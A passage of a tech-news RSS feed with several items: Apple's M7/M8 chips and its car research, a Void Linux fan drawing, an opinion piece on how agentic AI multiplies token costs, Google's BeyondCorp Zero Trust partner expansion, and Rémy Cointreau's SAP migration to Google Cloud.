<pubDate>Mon, 13 Jul 2026 06:53:29 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[For a long time, many people thought the cancelled car project was a huge waste of money and time for the giant tech company. However, it turns out that the decade of hard work is exactly what gave it the massive power boost needed for its newest computer parts.



The heavy artificial intelligence work done for the vehicles is now being packed directly into the upcoming processors, and this changes the entire narrative around the company's past decisions.



The cancelled vehicle project gave life to better processors



When Apple officially ended its vehicle program after ten years of secret development, critics called it a massive failure. But the company simply moved its vehicle team over to its AI division. All the advanced self-driving code it built required an incredible amount of smart computing.



Years ago, Tim Cook even called self-driving technology the mother of all smart projects. The company realized that if it could figure out how to make a car think for itself, it could easily make a laptop or an iPhone do amazing things. That early foundation is why Apple finalizes M7 chip design in record time to push AI limits today.



Focusing on smart features instead of basic speed upgrades



Instead of just making the next chips a little bit faster at opening apps or saving battery life, the designers took a totally different path. The M7 and M8 processors are built specifically to handle complex machine learning tasks that regular processors struggle with.



By using the blueprints from its car research, the brand is designing chips that process language and images locally. This shift in focus proves that the billions spent on the car were actually an early investment in the future of computing.



Rather than a forgotten mistake, the vehicle project will quietly live on in millions of devices sitting on our desks and in our pockets.]]></content:encoded>
</item>
<item>
<title><![CDATA[I drew a personified void linux, because I was bored.]]></title>
<description><![CDATA[(apologies if that was the incorrect flair, I didn't know where else to post this because the void linux sub seems to be for questions and tips involving void lmao) This was really fun to make tbh, 10/10 would recommend drawing personified linux distributions. The only real thing I was going for ...]]></description>
<link>https://tsecurity.de/de/3664112/linux-tipps/i-drew-a-personified-void-linux-because-i-was-bored/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664112/linux-tipps/i-drew-a-personified-void-linux-because-i-was-bored/</guid>
<pubDate>Mon, 13 Jul 2026 04:53:39 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>(apologies if that was the incorrect flair, I didn't know where else to post this because the void linux sub seems to be for questions and tips involving void lmao)</p> <p>This was really fun to make tbh, 10/10 would recommend drawing personified linux distributions. The only real thing I was going for while designing them was just trying to keep the outfit fairly minimal and sleek, because void is a pretty minimal and sleek distribution. I also, for some reason, made him look... Really polite? Idk how to describe it, I'm sure ykwim.</p> <p>The design obviously not perfect, but I like it. I might go back and change some things (like idk, I might turn the void logo into a halo kinda thing and give him wings or something along those lines? Might be cool), but that's a thing for future me to do.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/BurntCheeseSauce"> /u/BurntCheeseSauce </a> <br> <span><a href="https://i.redd.it/rlzxnha3swch1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uuyzax/i_drew_a_personified_void_linux_because_i_was/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepSeek cut prices 75%. The 100x problem remains]]></title>
<description><![CDATA[DeepSeek's recent decision to drastically cut pricing on its V4-Pro model by 75% should have been unequivocally good news for enterprise AI vendors and developers. Instead, many are discovering that cheaper models don’t automatically translate into healthier margins.The reason is simple: While in...]]></description>
<link>https://tsecurity.de/de/3663813/it-nachrichten/deepseek-cut-prices-75-the-100x-problem-remains/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663813/it-nachrichten/deepseek-cut-prices-75-the-100x-problem-remains/</guid>
<pubDate>Sun, 12 Jul 2026 22:16:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>DeepSeek's recent decision to <a href="https://venturebeat.com/infrastructure/how-deepseeks-radical-architecture-is-shattering-silicon-valleys-token-moat">drastically cut pricing</a> on its V4-Pro model by 75% should have been unequivocally good news for enterprise AI vendors and developers. Instead, many are discovering that cheaper models don’t automatically translate into healthier margins.</p><p>The reason is simple: While inference costs plummet, agent systems are voraciously consuming tokens faster than prices are declining. For the last 2 decades, software economics was dictated by the same rule. Infra became cheaper every year whereas applications became more capable. AI was initially hypothesized to follow the same pattern. As frontier models improved and token prices dropped, many assumed inference would become a negligible operating expense.That assumption has begun crumbling exponentially. </p><p>A chatbot usually turns one user question into one model call. <a href="https://venturebeat.com/orchestration/what-billions-of-ai-predictions-taught-expedia-before-the-age-of-ai-agents">An agent</a> turns it into a chain of planning, retrieval, tool use, verification, summarization, and follow-up decisions. The user sees one answer. The vendor pays for the loop. That is the 100x problem: The same user-visible request can cost a lot  more to serve as an agentic workflow than as a chatbot or retrieval-augmented generation (RAG) response. In longer-running workflows, the multiplier is higher. Falling model prices help, but they do not fix a product architecture that turns one prompt into dozens of billable operations.</p><p>The scale of what is now at stake is clear in how model providers themselves are pricing developer relationships. OpenAI's proposed program to give every Y Combinator startup $2 million in API credits — a number that would have funded an entire seed round in any prior tech cycle, and when the same cohort got by on a few thousand dollars of AWS credits — is less a recruiting perk than an admission of what it now costs to run an AI-native company through its first year of product. For established enterprises retrofitting agents into existing product lines, the absolute numbers are larger still.</p><h2>What token amplification is</h2><p>In a single-turn chatbot, one user message produces roughly one model call. Input-to-billed ratio is about 1:5.</p><p>In a <a href="https://venturebeat.com/security/forget-typosquatting-slopsquatting-is-the-software-supply-chain-threat-created-by-ai-coding-tools">multi-step agent</a> rolled out across customer support, sales operations, finance, legal review, and engineering, that ratio routinely lands at <b>1:700 or higher</b>. Every loop iteration carries forward the cumulative conversation, tool outputs, and reasoning traces. Each step appends; nothing is dropped.</p><p>A "simple" agent query like “<i>What did our top customer ask about last week?”</i> typically touches seven priced operations before returning an answer:</p><ol><li><p>User prompt (~50 tokens)</p></li><li><p>System prompt and tool definitions (~3,000 tokens, repeated on every call)</p></li><li><p>Retrieval (~5,000 tokens of context)</p></li><li><p>Model call #1 — tool selection (8,000 in / 200 out)</p></li><li><p>Tool execution (~4,000 tokens returned)</p></li><li><p>Model call #2 — summarization (12,000 in / 400 out)</p></li><li><p>Model call #3 — follow-up decision (12,400 in / 100 out)</p></li></ol><p>One sentence in, roughly 35,000 input tokens billed. Somewhere between $0.10 and $0.40 per query on a frontier model. Multiply that by a million queries a month — the table-stakes volume for any enterprise B2B feature — and the line item is six figures.</p><h2>Why this breaks the existing AI business model</h2><p>The dominant pricing story for <a href="https://venturebeat.com/security/prompt-injection-is-exploiting-enterprise-ais-biggest-design-flaws-by-targeting-agents-rag-pipelines-and-model-routers">enterprise AI</a> has been <i>seat-based SaaS</i>: Pay per-user per-month, deliver agent capability, capture margin. That model assumes a reasonably bounded cost-per-user.</p><p>Token amplification breaks the assumption. A power user running 50 agent invocations a day on a $40/seat plan can cost more in inference than the plan charges. Token amplification shatters the traditional SaaS pricing model. When a power user’s daily agent activity costs more in inference than their monthly subscription fee, vendor gross margins turn negative, a paradox that compounds as customers deepen their agent adoption, the very usage curve vendors are selling to their boards. Several vendors are now privately reporting negative gross margins on heavy users, mirroring recent cloud expenditure reports from the Bessemer 'Supernova' cohort, where the correlation between AI-agent adoption and gross margin contraction has moved from a theoretical risk to a primary P&amp;L headwind.</p><p>The visible symptoms have started leaking into public coverage. Bloomberg this week documented a widening gap between Salesforce's Agentforce marketing demos and the capabilities actually shipping to customers. This is the kind of gap that opens predictably when promised functionality is technically possible but uneconomical to serve at the price the seat plan implies. Salesforce is the most-watched case, not a unique one.</p><p>"For my team, the cost of compute is far beyond the costs of the employees." — <i>Bryan Catanzaro, VP of Applied Deep Learning, Nvidia</i></p><p>The strategic implication is not "AI is expensive." It is that the dominant business model assumed by most AI-native company plans does not survive contact with agentic workloads. </p><h2>A simple example</h2><p>Consider an enterprise software vendor charging $40 per-user per-month for an AI-enabled support assistant. A traditional chatbot might cost only a few cents per user per day in inference, leaving healthy gross margins.</p><p>Now replace that chatbot with a fully agentic workflow capable of investigating tickets, querying internal systems, drafting responses, validating outputs, and escalating exceptions. If a heavy user executes 50 to 100 agent requests per day, inference consumption can increase by an order of magnitude. What was once a negligible infrastructure cost becomes a material operating expense.</p><p>This creates an unusual dynamic: The customers receiving the most value from the product are often the customers generating the highest inference costs. In extreme cases, vendors can find themselves with their most engaged users contributing the least profit. The result is a growing realization across enterprise software that agent adoption and margin expansion are no longer automatically aligned.</p><h2>Agent orchestration is the new moat</h2><p>The technical responses are known and converging. They are not novel, but they are critical for survival</p><ul><li><p><b>Cost-aware routing</b>: This technique involves a small classifier model that decides which tier (Haiku, Sonnet, Opus equivalents) handles each query. Well-tuned routers cut inference bills by around 60% without any degradation in quality</p></li><li><p><b>Prompt caching</b>: <a href="https://venturebeat.com/infrastructure/claude-code-turned-every-engineer-into-three-now-companies-need-more-product-thinkers">Anthropic</a>, OpenAI, and Google now offer 75 to 90% discounts on cached prefixes. </p></li><li><p><b>Context discipline</b>: You can truncate tool outputs, prune reasoning traces, and cap tool depth to prevent your agent from going down a rabbit hole</p></li><li><p><b>Speculative decoding</b>: for self-hosted deployments, this technique guarantees 2 to 3X effective throughput on the same GPUs.</p></li></ul><p>"Organizations using orchestration-led governance report stronger productivity gains — a holistic orchestration layer is associated with six times greater productivity impact than compliance‑only approaches" — <a href="https://www.ibm.com/thought-leadership/institute-business-value/en-us/report/ai-orchestration-layer"><i><u>IBM</u></i></a></p><p>The companies building this layer well are starting to look less like microservice operators and more like <b>financial trading systems</b>: Every routing decision priced, every path with its own P&amp;L, every tenant on a metered budget.</p><h2>What enterprise leaders should actually do</h2><p>F<!-- -->our moves separate the companies that will still have margin in 24 months from the ones that won't:</p><ol><li><p><b>Make inference cost a first-class metric.</b> Track it per-feature, per-tenant, per-query class the same way cloud cost was tracked starting in the mid-2010s.</p></li><li><p><b>Budget like a media buyer.</b> Set cost-per-thousand-queries ceilings per feature. Cap them. Alert on overruns. Engineering will not enforce this on its own.</p></li><li><p><b>Treat the router as core infrastructure, not an optimization.</b> It is the new load balancer.</p></li><li><p><b>Audit prompts quarterly.</b> A 4,000-token system prompt that grew organically over six months is a six-figure bill in slow motion. Most teams have never read their own production prompts end to end.</p></li><li><p><b>Negotiate volume commits early.</b> Frontier-model vendors now offer reserved-instance-style prepaid commits at substantial discounts. List price is the worst price any enterprise will ever pay.</p></li></ol><h2>The next 24 months</h2><p>The structural shift underneath agentic AI is not that it is expensive. As DeepSeek's price cut today underscores, frontier inference unit costs are dropping roughly 3X per year, and the curve is not slowing.</p><p>The shift is that <b>amplification is outrunning the price cuts</b>. Cutting per-token costs 75% does not help a company whose agents are doing 700X more tokens per user query than its pricing model assumed. For the first time since the cloud era began, architecture decisions are again financial decisions in real time. A prompt redesign is a margin event. A poorly bound agent loop is an outage with a credit card attached.</p><p>The companies that survive the next 24 months of AI infrastructure pricing will not be the ones running the cheapest model. They will be the ones whose agents are smart <b>and</b> know what they cost to think.</p><p>That is the 100X problem. And it is arriving faster than the price cuts can hide it.</p><p><i>Maitreyi Chatterjee is a senior software engineer at a big tech company.</i></p><p><i>Devansh Agarwal works as an ML engineer at a leading tech company.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Power of Apple's M7 & M8 chips was born from Apple Car research]]></title>
<description><![CDATA[We've been telling you this for years — Apple Car research wasn't lit on fire, and the fruits of Apple's labor on it will be seen in artificial intelligence performance in the M7 and M8 processor.16-inch MacBook Pro will be the first to get M7 Pro processorsBefore AI used to be called Apple's big...]]></description>
<link>https://tsecurity.de/de/3663483/ios-mac-os/power-of-apples-m7-m8-chips-was-born-from-apple-car-research/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663483/ios-mac-os/power-of-apples-m7-m8-chips-was-born-from-apple-car-research/</guid>
<pubDate>Sun, 12 Jul 2026 17:09:21 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We've been telling you this for years — Apple Car research wasn't lit on fire, and the fruits of Apple's labor on it will be seen in artificial intelligence performance in the M7 and M8 processor.<br><br><div><img src="https://photos5.appleinsider.com/gallery/61811-127942-Glossy-VS-Matte-Displaky-xl.jpg" alt="Two laptops on a wooden table display video editing software, with lighting creating a warm, cozy atmosphere." height="738"><br><span>16-inch MacBook Pro will be the first to get M7 Pro processors</span></div><br>Before AI used to be called Apple's <a href="https://appleinsider.com/articles/23/12/21/apple-isnt-behind-on-ai-its-looking-ahead-to-the-future-of-smartphones">biggest failure</a>, that title went to the <a href="https://appleinsider.com/inside/apple-car" title="Apple Car" data-kpt="1">Apple Car</a> which was cancelled after ten years of development and <a href="https://appleinsider.com/articles/24/02/29/abandoned-10-billion-apple-car-project-referred-to-as-titanic-disaster-by-employees">ten billion dollars</a> of investment. <em>AppleInsider</em> argued at the time that Apple Car research would pay off, but now both of these failures are being recast as positives, with <em>Bloomberg</em> saying this research is <a href="https://www.bloomberg.com/account/newsletters/power-on">being used</a> in designing future AI processors.<br><br>The report claims that for the future M7 and M8 processors, Apple is concentrating more on AI support than on issues such as overall speed and power efficiency. This reportedly means that these chip designs for the <a href="https://appleinsider.com/inside/mac" title="Mac" data-kpt="1">Mac</a> and Apple Intelligence servers are based on the company's efforts toward a self-driving car.<br><br><br> <a href="https://appleinsider.com/articles/26/07/12/power-of-apples-m7-m8-chips-was-born-from-apple-car-research?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244932?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Democratizing Zero Trust with an expanded BeyondCorp Alliance]]></title>
<description><![CDATA[The need to quickly provide secure access for a newly remote workforce during the early days of COVID-19 drove many organizations to explore new technologies and start down a path towards a Zero Trust model. As time has passed, it’s become clear that remote work will be a defining characteristic ...]]></description>
<link>https://tsecurity.de/de/3662848/it-security-nachrichten/democratizing-zero-trust-with-an-expanded-beyondcorp-alliance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662848/it-security-nachrichten/democratizing-zero-trust-with-an-expanded-beyondcorp-alliance/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>The need to quickly provide secure access for a newly remote workforce during the early days of COVID-19 drove many organizations to explore new technologies and start down a path towards a Zero Trust model. As time has passed, it’s become clear that remote work will be a defining characteristic of the new normal, and modernizing security by fully embracing zero trust models is an imperative, not an option. We need to work to further democratize this technology, accelerate and ease its adoption to help organizations stay secure, agile, and productive.</p><p>We’ve been working on Zero Trust for more than a decade at Google, and earlier this year, we introduced <a href="https://cloud.google.com/solutions/beyondcorp-remote-access">BeyondCorp Remote Access</a>, our cloud-based solution that helps make access to internal applications easier and more secure. We offer similar <a href="https://support.google.com/a/answer/9275380?hl=en" target="_blank">context-aware access controls</a> for apps in <a href="https://workspace.google.com/" target="_blank">Google Workspace</a> and <a href="https://cloud.google.com/identity">Cloud Identity</a>. </p><p><a href="https://cloud.google.com/blog/products/identity-security/simplifying-identity-and-access-management-of-your-employees-partners-and-customers">Last year</a>, we assembled a group of partners that share our Zero Trust vision and who are committed to help our joint customers make it a reality: the BeyondCorp Alliance. These partners are key to our effort to further promote and democratize this technology. They allow customers to leverage existing controls to make adoption easier while adding key functionality and intelligence that enable customers to make better access decisions. We’re now pleased to announce that <a href="https://www.citrix.com/" target="_blank">Citrix</a>, <a href="https://www.crowdstrike.com/" target="_blank">CrowdStrike</a>, <a href="https://www.jamf.com/" target="_blank">Jamf</a>, and <a href="https://www.tanium.com/" target="_blank">Tanium</a> are joining <a href="https://www.checkpoint.com/" target="_blank">Check Point</a>, <a href="https://www.lookout.com/news-and-press/press-releases/beyondcorp" target="_blank">Lookout</a>, <a href="https://researchcenter.paloaltonetworks.com/2019/04/beyondcorp/" target="_blank">Palo Alto Networks</a>, <a href="https://www.symantec.com/blogs/feature-stories/symantec-partners-google-cloud-improve-zero-trust-cloud-access" target="_blank">Symantec</a> (a division of Broadcom), and <a href="http://blogs.vmware.com/euc/2019/04/workspace-one-google-cloud.html" target="_blank">VMware</a> as BeyondCorp Alliance members.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/BeyondCorp_Alliance.max-1000x1000.jpg" alt="BeyondCorp Alliance.jpg">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>As Sunil Potti, VP and GM Google Cloud Security, puts it, BeyondCorp delivers world-class security for the reimagined workplace. Partners who share our vision are an essential part of how we help our customers modernize their security approaches in-place to deliver a better, safer normal.</p><p>Our BeyondCorp Alliance Partners add capabilities in the following areas:</p><p><b>Device Management</b>: Enterprise Mobility Management (EMM) vendors can provide device context and telemetry such as whether a device is managed or corporate-owned to aid in policy evaluation.</p><p><b>Endpoint Security</b>: Endpoint Detection and Response Vendors (EDR) or Mobile Threat Defense (MTD) vendors can provide device posture information, such as whether a device is compromised to aid in policy evaluation.</p><p><b>Gateways</b>: Infrastructure vendors can provide more secure access to hosted infrastructure (e.g., virtual desktops, etc.) via BeyondCorp. </p><p>Keep reading to learn more about updates to our existing BeyondCorp Alliance partnerships and new solutions with leading security partners that we are excited to announce today: </p><p><b>Check Point</b> SandBlast Mobile is a mobile threat defense solution that detects and stops attacks on iOS and Android devices before they start. Integration with the Google Admin console can be used to selectively prevent compromised devices from accessing applications and resources, helping to keep sensitive data secure. The integration is now available to customers in preview in the Google Admin console.</p><p><b>Citrix</b> and Google Cloud are extending our deep collaboration to include BeyondCorp. Google Cloud has always been one of the best places to run <a href="https://www.citrix.com/products/citrix-workspace/" target="_blank">Citrix Workspace</a>, and the first step, bringing together Citrix Workspace and BeyondCorp, is coming soon. It will allow customer applications, whether they are deployed on-premises, on GCP, or delivered as a service (SaaS), to be exposed through Citrix Workspace with BeyondCorp’s access controls and policy enforcement. Users get a single pane of glass for all of their applications, which can now be accessed from BYOD and non-corporate devices without the need for a VPN. We’re also exploring the sharing of endpoint signals and further extending policy enforcement to virtual desktops. For more information, check out the Citrix <a href="https://www.citrix.com/blogs/2020/10/13/deliver-workspace-security-and-zero-trust-with-citrix-and-google-cloud/" target="_blank">blog</a> on our joint zero trust security solutions.</p><p><b>CrowdStrike</b> will deliver real-time endpoint posture assessments from endpoints regardless of location, network, or user so that BeyondCorp adopters can prohibit access from untrusted or compromised hosts as part of conditional access policies, reducing risk for users and the organization. This integration is coming soon. To learn more about how CrowdStrike and Google Cloud are collaborating on Zero Trust, <a href="https://na.eventscloud.com/ereg/index.php?eventid=560023&amp;utm_campaign=fal_con&amp;utm_medium=dir&amp;utm_source=blog" target="_blank">register</a> for CrowdStrike’s Cybersecurity Conference <a href="https://www.crowdstrike.com/events/falcon/?utm_campaign=fal_con&amp;utm_medium=dir&amp;utm_source=blog" target="_blank">Fal.Con 2020</a>, taking place on October 15, 2020.</p><p><b>Jamf</b> is working to extend its device compliance capabilities for organizations leveraging Google Cloud and BeyondCorp. In the past, organizations have expressed concerns about unprotected Mac devices accessing cloud and on-premises resources. Now, through a unique Jamf preview, customers can ensure that only trusted users, from managed devices, using approved apps, are accessing company data. Read Jamf’s <a href="https://www.jamf.com/blog/jamf-and-google-announce-conditional-access-partnership-preview" target="_blank">blog</a> on our collaboration and <a href="mailto:google.ca@jamf.com">contact the Jamf team</a> to learn more about this preview.</p><p><b>Lookout</b> continuously assesses a smartphone, tablet or Chromebook’s risk level and provides it to Cloud Identity and BeyondCorp from the Lookout Security Graph. Device risk levels of “high, moderate  or low” are set based on the organization’s security policies. When Lookout detects a threat on a mobile device, the risk level is changed accordingly and delivered in real-time to Cloud Identity via API. This integration enables Google Workspace to block risky or non-compliant devices from accessing applications and data. This functionality is now available in preview via the Google Admin console. Learn more by reading Lookout’s <a href="https://blog.lookout.com/lookout-google-deliver-zero-trust-beyondcorp-vision-for-mobile" target="_blank">blog</a>.</p><p><b>Symantec</b> Endpoint Protection (SEP) and Symantec Endpoint Protection Mobile (SEP Mobile) report on the security posture of an organization’s traditional and mobile endpoints, including both managed and unmanaged devices. With the upcoming integration, customers can leverage Symantec’s endpoint signals such as indications of compromise, operating system configuration risks, app risks, anomalous network behavior, and more, to create more granular and customized access policies for Google Workspace, web apps, and Google Cloud infrastructure.</p><p><b>Tanium</b> and Google Cloud recently<a href="https://www.tanium.com/press-releases/tanium-and-google-cloud-join-forces-to-deliver-security-transformation-for-the-distributed-it-era/" target="_blank"> announced</a> a strategic partnership with the goal of delivering security transformation for the distributed IT era. As part of the BeyondCorp Alliance, Tanium will be providing device identity information through <a href="https://docs.tanium.com/endpoint_identity/endpoint_identity/userguide.html" target="_blank">Tanium Endpoint Identity</a>, which is available today. Tanium monitors and evaluates the health of endpoints in real-time, providing comprehensive visibility and control from a single platform no matter where the device is located. Through the combined solution, coming soon, organizations will be able to ensure that devices connecting to network resources and applications are authorized, secured, and up-to-date. To learn more about Tanium’s partnership with Google Cloud and BeyondCorp integration,<a href="https://converge.tanium.com/" target="_blank"> register to attend</a> their upcoming virtual user conference, Converge.</p><p><b>VMware</b> is working to bring Workspace ONE and Google Cloud's BeyondCorp solution together to keep devices under control and compliant with policies that protect corporate data. Workspace ONE will continually feed device compliance status information to Google Cloud’s context-aware access engine, allowing access to be revoked at any time if a device becomes non-compliant. This integration is coming soon.</p><p>To learn more about how you can take advantage of our joint capabilities to advance your own Zero Trust strategy, visit the BeyondCorp Alliance partner links above or <a href="mailto:beyondcorp.alliance@google.com">reach out to our team</a>. </p><p>Also be sure to check out our <a href="https://cloud.google.com/solutions/beyondcorp-remote-access">BeyondCorp product home</a>, browse BeyondCorp educational resources in our <a href="https://cloud.google.com/security/best-practices#section-3">Security Best Practices Center</a>, and view BeyondCorp use case videos in our <a href="https://cloud.google.com/security/showcase">Cloud Security Showcase</a>.</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/identity-security/keep-your-teams-working-safely-with-beyondcorp-remote-access/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Keep your teams working safely with BeyondCorp Remote Access</h4>
            <p class="uni-related-article-tout__body">Enabling remote access to internal apps with a simpler and more secure approach without a remote-access VPN</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rémy Cointreau drives customer centricity with SAP on Google Cloud]]></title>
<description><![CDATA[Imagine the challenge of supply chain planning and meeting changing consumer needs when you have products that can take up to one-hundred years to produce. That’s the case for Rémy Cointreau, a family-owned maker of fine spirits whose roots go back to 1724. With rapidly evolving consumer expectat...]]></description>
<link>https://tsecurity.de/de/3662845/it-security-nachrichten/rmy-cointreau-drives-customer-centricity-with-sap-on-google-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662845/it-security-nachrichten/rmy-cointreau-drives-customer-centricity-with-sap-on-google-cloud/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Imagine the challenge of supply chain planning and meeting changing consumer needs when you have products that can take up to one-hundred years to produce. That’s the case for <a href="https://www.remy-cointreau.com/en/" target="_blank">Rémy Cointreau</a>, a family-owned maker of fine spirits whose roots go back to 1724. </p><p>With rapidly evolving consumer expectations and heavy competition from premium beverage brands, Rémy Cointreau set out on a strategy to put the customer at the center of their business. Offering more than a premium beverage, <a href="https://www.remy-cointreau.com/en/brands/" target="_blank">key brands</a> such as Rémy Martin cognac, Louis XIII cognac, Cointreau and St-Rémy brandy instead would offer customers a taste of luxury. “The idea is not to simply sell Cognac,” explains Sebastien Huet, the company’s CTO. “We want to sell a French way of living. For that, we needed to shift from selling products to selling an experience.”</p><p>To make this a reality, Rémy Cointreau realized all elements of its business would need to be more agile. It needed more flexibility in its SAP systems, which drive Finance, Manufacturing and Supply Chain, and easy access to valuable SAP system data for business decision making and innovative customer approaches. As a result, Rémy Cointreau determined they’d need to move to the cloud to enable such a transformation. </p><p>First, Rémy Cointreau elicited the help of long-time partner <a href="https://www.oxya.com/services/managed-cloud-services/google-cloud/" target="_blank">oXya</a>. The Rémy Cointreau/oXya collaboration dates back 10 years, including the move of the on-prem SAP environment to oXya where they provided managed services. oXya deeply understood the pain points of Rémy Cointreau’s SAP landscape and worked with the company to capture and translate their business and functional requirements, followed by benchmarking various cloud solutions. Rémy Cointreau’s business was spread over two SAP landscapes, with interface and data consistency challenges, which needed to be unified to one SAP system and migrated to S/4HANA. Choosing the right cloud platform was critical to drive the SAP environment to deliver more value. </p><p>“Scalability, flexibility and cost savings were important to Rémy Cointreau but also they had a strong desire to focus on data aspects beyond SAP,” says Matthieu Petitprez, Deputy Chief Technology Officer, oXya, a Hitachi Group Company. “<a href="https://cloud.google.com/solutions/sap">Google Cloud</a>, with its specific data analysis and management tools, completely met this objective. It allows integration of SAP with <a href="https://cloud.google.com/bigquery">BigQuery </a>and artificial intelligence services, bringing more value to the SAP solution.” </p><p>“Just as it takes years to create a great cognac, we value partners who will be by our side for a long time,” says Huet, noting that it’s not unusual for the company to enter into 30- or 40-year agreements with suppliers. “The strategic alliance between Google Cloud and SAP made us confident they were the right choice for us. Google Cloud has a more comprehensive strategic partnership with SAP than its competitors and is clearly adding value to SAP.” </p><p>Although the pandemic forced them to drive the migration remotely, Rémy Cointreau, oXya and Google Cloud’s Professional Services Organization (PSO) collaborated to achieve the European operations go-live in April 2020. “I was worried that COVID-19 would delay our launch, but migration was fast, easy, and on-schedule,” says Mr. Huet. “The technology played a part, but it also helped that we had two partners who we believed in.”</p></div>
<div class="block-paragraph"><h3>Improved manufacturing and service with business agility</h3><p>The SAP S/4HANA deployment on Google Cloud Platform is now live for Rémy Cointreau’s Europe based operations. In addition to S/4, it also migrated the SAP supply chain planning tool, Advanced Planner and Optimizer (APO), as well as SAP’s Business Warehouse to Google Cloud. Similar deployments will launch soon globally. </p><p>While the environment is still new, Rémy Cointreau already sees big steps towards greater agility with Google Cloud. For instance, Google Cloud makes it much faster and easier to adjust the technical operating environment. If a team wants to start performing a new resource-heavy analysis, Rémy Cointreau can expand capacity to meet demands within minutes. The team can also roll back capacity so that it is only using the resources it needs.</p><p>This newfound agility takes the pressure off the IT team when it comes to provisioning a new implementation for future capacity. Rather than try to build capacity for potential peaks, the team can deploy for expected demand, then easily adjust afterward to compensate for actual loads. “It makes capacity planning so much easier,” Mr. Huet says. “Not long after go-live, we had to perform some updates—increasing memory and so on,” he recalls. “In the past, the process would take about a month to do. Now it takes a few minutes. We literally went from five weeks to five minutes. This is a tremendous improvement.” </p><p>Another critical factor in Rémy Cointreau’s decision to move to Google Cloud was the ability to connect its SAP backbone to key SaaS applications such as Salesforce. As the company began to put more focus on the customer experience, creating strong, long-term relationships with customers would be essential. By being able to create this 360 degree view of data among SAP, Salesforce, and its ecommerce platform, Rémy Cointreau can more easily create personalized experiences for its customers that simply weren’t possible before.</p><h3>A data-driven future</h3><p>Rémy Cointreau business users are already reaping benefits from the cloud deployment. “One of the key improvements is the ability to analyze live data,” Huet says. “That was not the case in the past. Previously, there was a 24-hour lag between the time the data came in and the moment it could be analyzed. This is especially important on the production-management side, where every hour counts.” </p><p>As exciting as the improvements in agility and connectivity have been so far, Huet sees even more possibilities for the future. “Right now, we’re focused on establishing SAP in the Google Cloud environment,” he says. “But once that’s done, we’ll be looking at technologies like <a href="https://cloud.google.com/bigquery">BigQuery</a> that can take our data analysis to the next level.” Potential areas of interest include product traceability and customer experience. “Now that we’re fully deployed on Google Cloud Platform, anything is possible,” he notes. “We can pull data in from multiple sources via integration and analyze it in a matter of days. We don’t need a three-month project to see value.” </p><p>It is this agility and creativity that makes Huet most optimistic about the company’s partnership with Google Cloud. As he notes, “I think the best is yet to come.” </p><p>To learn more about Rémy Cointreau’s deployment of <a href="https://cloud.google.com/solutions/sap">SAP on Google Cloud</a>, read the case study <a href="https://cloud.google.com/customers/remy-cointreau">here</a>. Also learn more about <a href="https://www.oxya.com/services/managed-cloud-services/google-cloud/" target="_blank">oXya’s capabilities with Google Cloud for SAP customers</a>.</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/sap-google-cloud/reports-examine-business-value-of-running-sap-on-google-cloud/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
